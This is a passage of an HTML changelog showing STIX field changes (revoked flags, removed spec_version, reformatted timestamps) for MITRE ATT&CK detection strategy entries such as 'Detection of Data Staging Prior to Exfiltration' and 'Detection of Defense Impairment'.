Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0891] Detection of DNS Server</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0862] Detection of DNS Server</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.686000+00:00</td></tr></tbody></table></details><hr><h4>[DET0877] Detection of DNS/Passive DNS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0511] Detection of Data Access and Collection from Removable Media</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0146] Detection of Data Destruction Across Platforms via Mass Overwrite and Deletion Patterns</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0123] Detection of Data Exfiltration via Removable Media</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0014] Detection of Data Staging Prior to Exfiltration</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0465] Detection of Default Account Abuse Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.693000+00:00</td></tr></tbody></table></details><hr><h4>[DET0900] Detection of Defense Impairment</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16T17:13:38.727Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 17:13:38.727000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:23:12.031Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0497] Detection of Defense Impairment through Disabled or Modified Tools across OS Platforms.</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:24:31.994Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0806] Detection of Determine Physical Locations</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0853] Detection of Develop Capabilities</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0848] Detection of Digital Certificates</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0831] Detection of Digital Certificates</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.670000+00:00</td></tr></tbody></table></details><hr><h4>[DET0844] Detection of Digital Certificates</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0211] Detection of Direct VM Console Access via Cloud-Native Methods</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid 